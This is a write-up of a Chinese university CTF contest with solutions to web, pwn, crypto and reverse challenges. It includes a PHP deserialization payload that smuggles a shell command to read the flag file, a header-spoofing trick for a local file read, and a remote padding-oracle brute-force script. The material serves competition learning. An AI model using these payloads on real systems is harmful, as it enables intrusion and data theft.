FIRST
“駭極杯”全國大學生網絡安全邀請賽一手WriteUp
——特別感謝本文作者:flam4nplus——
本文作者多次參與“安恆杯”取得亮眼的成績
在本次”駭極杯”中他所在的隊伍取得了
rank 7、re和crypto均AK的好成績
~Congratulations!
Web
web1
首先,burpsuite抓一波流量
將GET改爲POST,並且post admin=1
訪問robots.txt
發現有source.php和flag.php
訪問flag.php無果,所以只能去看source.php
這裏看到需要僞造ip 在頭中僞造ip只有幾種情況:xff xci clientip remoteaddr
這裏添加X-Client-IP:127.0.0.1
繼續post url
這裏就能看到加載了圖片
卡在這裏好久,忽然想到因爲是127.0.0.1會不會是file協議 進行嘗試
發現還是會加載,在上面圖片中也發現,不是jpg而是html 所以這裏curl一下
順便拿到了題目源碼
<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param 'admin' -->";
if(isset($_POST['admin']))
{
if($_POST['admin']==1)
{
if($_SERVER['HTTP_X_CLIENT_IP'])
{
if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com')
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $_POST['url']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$content = curl_exec($curl);
curl_close($curl);
$filename='download/'.rand().';img1.jpg';
file_put_contents($filename,$content);
echo $_POST['url'];
$img="<img src=\"".$filename."\"/>";
echo $img;
}
else
{
echo "you need post url: http://www.ichunqiu.com";
}
}
else
{
echo "only 127.0.0.1 can get the flag!!";
}
}
}
else
{
$_POST['admin']=0;
}順帶就拿到了flag
web2
這道題目首先用掃描軟件掃到了泄漏的源碼
<?php
error_reporting(0);
class come{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function echo($host){
system("echo $host");
}
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
if($i===1)
{
$i++;
$$key = $value;
}
else{break;}
}
if($first==="doller")
{
@parse_str($_GET['a']);
if($var==="give")
{
if($bbb==="me")
{
if($ccc==="flag")
{
echo "<br>welcome!<br>";
$come=@$_POST['come'];
unserialize($come);
}
}
else
{echo "<br>think about it<br>";}
}
else
{
echo "NO";
}
}
else
{
echo "Can you hack me?<br>";
}
?>然後是反序列化漏洞
直接firefox f12 hackbar
http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123
直接拿到flag
Misc
簽到
很簡單的base32,直接在線解密
MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q
easy-py
此類型題目,正好在之前出過一道題,不過之前的WP寫的太簡單了,pyc的字節碼忘的都差不多了。這次趕緊蒐羅一波,把相關的東西保存一下。 參考鏈接如下: https://github.com/python/cpython/blob/master/Include/opcode.h https://bbs.pediy.com/thread-246683.htm https://das.scusec.org/2017/03/24/pythonopcode/ http://unpyc.sourceforge.net/Opcodes.html
整理之後的opcode如下:
03f3 0d0a
bebc ce5b
63
00 0000 00
00 000000
0f 0000 00
40 0000 00
73
b200 0000 178長度
710600 JUMP_ABSOLUTE
642333 LOAD_CONST
710900 JUMP_ABSOLUTE 12個
640000 LOAD_CONST 0
640100 LOAD_CONST 1
640200 LOAD_CONST 2
640300 LOAD_CONST 3
640400 LOAD_CONST 4
640500 LOAD_CONST 5
640200 LOAD_CONST 2
640600 LOAD_CONST 6
640600 LOAD_CONST 6
640700 LOAD_CONST 7
640800 LOAD_CONST 8
640900 LOAD_CONST 9
640a00 LOAD_CONST a
640b00 LOAD_CONST b
640c00 LOAD_CONST c
670f00 BUILD_LIST f cmp[0xf]
5a0000 STORE_NAME 0
m[0xf]=[0,10,7,1,29,14.7,22,22,31,57,30,9,52,27]
650100 LOAD_NAME 1 raw_input
830000 CALL_FUNCTION 0
5a0200 STORE_NAME 2 flag
640000 LOAD_CONST 0 0
5a0300 STORE_NAME 3 m=0
{
785b00 SETUP_LOOP while
650200 LOAD_NAME 2 flag
44 GET_ITER
5d5300 FOR_ITER
5a0400 STORE_NAME 4 i=..
650500 LOAD_NAME 5 ord
650400 LOAD_NAME 4
830100 CALL_FUNCTION ord(i)
0f UNARY_INVERT ~
640d00 LOAD_CONST d 102
40 BINARY_AND &
650500 LOAD_NAME 5
650400 LOAD_NAME 4
830100 CALL_FUNCTION 1 ord(i)
641200 LOAD_CONST 0x12 -103
40 BINARY_AND &
42 BINARY_OR |
5a0400 STORE_NAME 4 i=..
650400 LOAD_NAME 4
650000 LOAD_NAME 0 cmp
650300 LOAD_NAME 3 m
19 BINARY_SUBSCR []
6b0200 COMPARE_OP 2 ==
7290 00 POP_JUMP_IF_FALSE
650300 LOAD_NAME 3 m
0b UNARY_NEGATIVE -m
640e00 LOAD_CONST 0xe -1
17 BINARY_ADD +
0b UNARY_NEGATIVE -
5a0300 STORE_NAME 3 m=...
714900 JUMP_ABSOLUTE
714900 JUMP_ABSOLUTE
640f00 LOAD_CONST f wrong
47 PRINT_ITEM
48 PRINT_NEWLINE
650600 LOAD_NAME 6 exit
830000 CALL_FUNCTION 0
01 POP_TOP
714900 JUMP_ABSOLUTE
57 POP_BLOCK
641000 LOAD_CONST right
47 PRINT_ITEM
48 PRINT_NEWLINE
641100
53 return
28 (STORE_SLICE
130000 00
69
0000 0000
69
0a 000000
69
0700 0000
69
0100 00 00
69
1d00 0000
69
0e00 00 00
69
1600 0000
69
1f 0000 00
69
39000000
69
1e 0000 00
69
0900 0000
69
34 000000
69
1b00 0000
69
66 0000 00
69
ffff ffff
74
0500 00 00
7772 6f6e67 wrong
74
05 0000 00
7269 67 6874 right
4e69 99ff ffff
28(
07 0000 00
74
0300 0000
636d 70 cmp
74
0900 0000
7261 775f696e 7075 74 raw_input
74
0400 0000
666c 6167 flag
74
010000 00
6d m
74
01 0000 00
69 i
74
03 0000 00
6f7264 ord
74
04 0000 00
65 7869 74 exit
)
28
0000 0000
28
00 0000 00
28
0000 0000
73
0a 0000 00
65 6173 795f 7079 2e70 79 easy_py.pyc
74
0800 0000
3c6d 6f64 756c 653e <module>
0100 0000
73
14 0000 00
33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02在做的過程中,遇到了一個坑,網上的opcode不全導致
6b0200 COMPARE_OP 2 == 7290 00 POP_JUMP_IF_FALSE
一直不知道是什麼,糾結了好久。 解密腳本如下:
cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
flag=[]
j=0
for c in range(15):
for i in range(255):
if cmp[j] == ((~i)&102)|(i&(-103)):
j=j+1
flag.append(chr(i))
break
print "".join(flag)Pwn
aessss
拿到源碼之後,發現unpad功能沒有check,可以通過修改unpad來從後向前逐字節爆破,得到最後的flag。
腳本如下
from pwn import *
import base64, time, random, string
from Crypto.Cipher import AES
from Crypto.Hash import SHA256, MD5
#context.log_level = 'debug'
def choice1():
p.sendline('1')
p.recvuntil('Here is the encrypted flag: 0x', drop = True)
enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True)
#print enflag
p.recvuntil('Your choice:', drop = True)
return enflag
def choice2(pad):
p.sendline('2')
p.recvuntil('Pad me something:', drop = True)
p.sendline(pad)
p.recvuntil('Your choice:', drop = True)
def bypassproof():
p.recvuntil('sha256(XXXX+')
lastdata = p.recvuntil(')', drop=True)
print lastdata
p.recvuntil(' == ')
digest = p.recvuntil('\nGive me XXXX:', drop=True)
print digest
def proof(s):
return SHA256.new(s + lastdata).hexdigest() == digest
data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed')
print data
p.sendline(data)
#p.recvuntil('Done!\n')
p = remote('106.75.13.64', 54321)
bypassproof()
p.recvuntil('Your choice:', drop = True)
flag_enc = choice1()
#print encflag
flag = ""
for i in range(33):
a = ''.join(['a' for _ in range(223)])
a = a[:-1] + chr(224 + i)
for c in string.printable:
#print c+flag
choice2(a)
choice2(c+flag)
if choice1() == flag_enc:
flag = c + flag
print "success:"+flag
breakCrypto
rsaaaa
首先要先proof 腳本如下
def brute_force(pad, shavalue):
dict = string.letters + string.digits
key = ""
for i1 in dict:
tmp = key
key1 = tmp + i1
for i2 in dict:
tmp = key1
key2 = tmp + i2
for i3 in dict:
tmp = key2
key3 = tmp + i3
for i4 in dict:
tmp = key3
key4 = tmp + i4
final_key = key4
if sha512(pad+key4).hexdigest()==shavalue:
print key4
return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1隨後要解決這裏的問題
發現根本不需要求解他的d和n
直接d=1,n=c-m就好
直接進入下一關
這裏需要做一個數學運算 先算cc = pow(2, e, n),然後算ccc = c*cc%n,然後把ccc發過去讓服務器解密,拿到明文後除以2
得到的就是MM
post後直接進行aes解密,拿到flag
整個交互過程如下
sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5 Tell me XXXX: ZTmx OK, you proof. Give you a message:0x6f57434e74344a6a4831485177694169 and its ciphertext:0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8 Please give me the private key to decrypt cipher n: 22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415 d: 1 Oh, how you know the private key! n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1 e=0xcf90945cb5ed1485 c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0 Now, you have a chance to decrypt something(but no c): 10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520 message:0xce6adae4ac9ec86c8ee264a28ae2a46e Give me right message: 137187895140717694653920589162394767927 Master in math! Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0
exp如下
#!/usr/bin/python
import random
import string
from hashlib import sha512
from Crypto.Util.number import *
from Crypto.Cipher import AES
'''
def brute_force(pad, shavalue):
dict = string.letters + string.digits
key = ""
for i1 in dict:
tmp = key
key1 = tmp + i1
for i2 in dict:
tmp = key1
key2 = tmp + i2
for i3 in dict:
tmp = key2
key3 = tmp + i3
for i4 in dict:
tmp = key3
key4 = tmp + i4
final_key = key4
if sha512(pad+key4).hexdigest()==shavalue:
print key4
return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1
m = 0x6f57434e74344a6a4831485177694169
c = 0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8
print c-m
n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0
cc = pow(2,e,n)
ccc = c*cc%n
print ccc
m = 0xce6adae4ac9ec86c8ee264a28ae2a46e
print m/2
'''
enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0'
enc_flag = enc_flag.decode('hex')
msg1 = '6f57434e74344a6a4831485177694169'.decode('hex')
msg2 = '67356d72564f64364771325145715237'.decode('hex')
cipher = AES.new(msg2, AES.MODE_CBC, msg1)
dec = cipher.decrypt(enc_flag)
print decReverse
cpp
簽到題吧 對C++瞭解一點就不會感到那麼陌生。
fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5,
0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5]
a = 0x99
b = 0xb0
c = 0x87
d = 0x9e
flag=[]
src=[0 for i in range(32)]
xor1=[0 for i in range(32)]
xor2=[0 for i in range(32)]
xor3=[0 for i in range(32)]
xor4=[0 for i in range(32)]
src[0]=a
src[1]=b
src[2]=c
src[3]=d
xor1[0]=a
xor1[1]=b^a
xor1[2]=a^b^c
xor1[3]=a^b^c^d
xor2[0]=a
xor2[1]=b
xor2[2]=a^c
xor2[3]=d^b
xor3[0]=a
xor3[1]=a^b
xor3[2]=c^b
xor3[3]=d^c
xor4[0]=a
xor4[1]=b
xor4[2]=c
xor4[3]=d
for i in range(4,32):
for j in range(255):
src[i]=j
xor1[i]=(xor1[i-1]^src[i])&0xff
xor2[i]=(xor2[i-1]^xor1[i])&0xff
xor3[i]=(xor3[i-1]^xor2[i])&0xff
xor4[i]=(xor4[i-1]^xor3[i])&0xff
if xor4[i]==fake[i]:
break
for i in range(32):
for j in range(256):
tmp = j*4
result = (((j>>6)|tmp)^i)&0xff
if result == src[i]:
flag.append(chr(j))
break
print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}flag{W0w_y0u_m4st3r_C_p1us_p1us}
cyvm
最後的時候才放出來,非常簡單的vm題 bytecode如下:
op d1 d2 [0x0F, scanf(%s) s 0x10, 0x14, 0x20, r0=0x20 0x10, 0x16, 0x00, r2=0 0x09, 0x24, point=0x24 jmp code[0x24] label code[0x9]: 0x02, 0x15, 0x16, r1=s[r2] r2=0 r1=s[0] 0xE9, ++i 0x12, 0x16, v2 = 2 r2++ r2=1 0xE8, ++i 0x02, 0x17, 0x16, r3=s[r2] r3=s[1] 0x13, 0x16, v3 = 2 r2-- r2=0 0x90, ++i 0x06, 0x15, 0x17, r1=r1^r3 r1=s[0]^s[1] 0x45, ++i 0x06, 0x15, 0x16, r1=r1^r2 r1=s[0]^s[1]^r2 0x76, ++i 0x01, 0x15, 0x16, s[r1]=r2 s[r1]=0 0x12, 0x16, v2=2 r2++ 0xFF, ++i label code[0x24]: 0x0A, 0x14, 0x16, v9 = r0 != r2 0x0C, 0x09, if(v9) true point = d1 0x0E sub_4006d6()!=0
解密腳本:
c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62]
# flag=[]
def encode():
flag='a'*0x20
for i in range(32):
c[i]=flag[i]^flag[i+1]^i
def decode():
flag=["}"]
a=[]
tmp = 125
for i in range(30,-1,-1):
tmp = c[i]^tmp^i
flag.append(chr(tmp))
print "".join(flag[::-1])
decode()flag{7h15_15_MY_f1rs7_s1mpl3_Vm}
What's_it
前面一部分a-z 6位md5爆破出luck string ozulmt
然後會進入自解碼部分,接下來纔是真正的驗證flag的部分,首先是驗證flag格式,並且格式化後之後提取出來,最後同固定數據進行比較即可!
爆破腳本如下:
import hashlib
import string
dic = string.ascii_lowercase
may_fla = []
for i in dic:
for j in dic:
for m in dic:
for n in dic:
for p in dic:
for q in dic:
flag=i+j+m+n+p+q
# print flag
hl = hashlib.md5()
hl.update(flag.encode(encoding='utf-8'))
flag_md5 = hl.hexdigest()
count=0
index_sum=0
for c in range(32):
if flag_md5[c] == '0':
count = count+1
index_sum = index_sum+c
if (10*count+index_sum) == 403:
may_fla.append(flag)
print may_fla解密腳本如下:
# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
# flag="flag{"
# flag[13]="-"
# flag[18]="-"
# flag[28]="-"
# flag[23]="-"
# flag[41]="}"
c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64]
flag = []
for i in c:
flag.append(chr(i))
print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}